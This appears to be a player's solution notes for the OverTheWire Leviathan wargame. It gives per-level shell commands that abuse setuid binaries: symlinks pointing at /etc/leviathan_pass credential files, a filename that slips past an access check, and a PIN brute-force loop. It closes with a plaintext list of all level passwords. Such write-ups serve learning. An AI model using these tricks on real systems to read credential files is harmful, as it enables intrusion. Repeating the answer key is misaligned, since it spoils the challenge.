.____              .___.__                                       .___
|    |    __ __  __| _/|__| ____________   ____  ______ ____   __| _/
|    |   |  |  \/ __ | |  |/  ___/\____ \ /  _ \/  ___// __ \ / __ | 
|    |___|  |  / /_/ | |  |\___ \ |  |_> >  <_> )___ \\  ___// /_/ | 
|_______ \____/\____ | |__/____  >|   __/ \____/____  >\___  >____ | 
        \/          \/         \/ |__|              \/     \/     \/ 

$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
$$ cd C:\Program Files\PuTTY                                                    $$
$$ putty.exe $ssh [level]@leviathan.labs.overthewire.org -P 2223 -pw [password] $$
$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$

** Commands **
$$$$$$$$$$$$$$
$$$ 000000 $$$
$$$$$$$$$$$$$$

ls -a
grep leviathan1 .backup/bookmarks.html

$$$$$$$$$$$$$$
$$$ 111111 $$$
$$$$$$$$$$$$$$

ls -la
ltrace ./check
 -- sex

$$$$$$$$$$$$$$
$$$ 222222 $$$
$$$$$$$$$$$$$$

ls -la
./printfile printfile
mkdir /tmp/ludis && touch /tmp/ludis/testfile.txt && cd /tmp/ludis/
ltrace ~/printfile testfile.txt
?? -- Acces -- && -- Print -- ??
rm  testfile.txt

touch password\ testfile.txt
ln -s /etc/leviathan_pass/leviathan3 /tmp/ludis/password
~/printfile "password testfile.txt"

$$$$$$$$$$$$$$
$$$ 333333 $$$
$$$$$$$$$$$$$$

ls -la
ltrace ./level3
 -- snlprintf

cat /etc/leviathan_pass/leviathan4

$$$$$$$$$$$$$$
$$$ 444444 $$$
$$$$$$$$$$$$$$

ls -la
cd .trash
ls -la
./bin
 -- 01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010

echo "01010100 01101001 01110100 01101000 00110100 01100011 01101111 01101011 01100101 01101001 00001010" | perl -lape '$_=pack"(B8)*",@F'

$$$$$$$$$$$$$$
$$$ 555555 $$$
$$$$$$$$$$$$$$

ls -la
ltrace ./leviathan5

ln -s /etc/leviathan_pass/leviathan6 /tmp/file.log

$$$$$$$$$$$$$$
$$$ 666666 $$$
$$$$$$$$$$$$$$

ls -la
ltrace ./leviathan6
ltrace ./leviathan6 0000
mkdir /tmp/levi6 && touch /tmp/levi6/forced.sh && cd /tmp/levi6
vi forced.sh

[i]
$$ #!/bin/bash
$$ for i in {0000..9999}
$$ do
$$     ~/leviathan6 $i
$$ done
[esc]
[:wq]

chmod u+x forced.sh
./forced.sh

cat /etc/leviathan_pass/leviathan7

$$$$$$$$$$$$$$
$$$ 777777 $$$
$$$$$$$$$$$$$$

ls -la
cat CONGRATULATIONS

-- Well guess I'm done then :)

** Passwords **
leviathan0:leviathan0
leviathan1:rioGegei8m
leviathan2:ougahZi8Ta
leviathan3:Ahdiemoo1j
leviathan4:vuH0coox6m
leviathan5:Tith4cokei
leviathan6:UgaoFee4li
leviathan7:ahy7MaeBo9

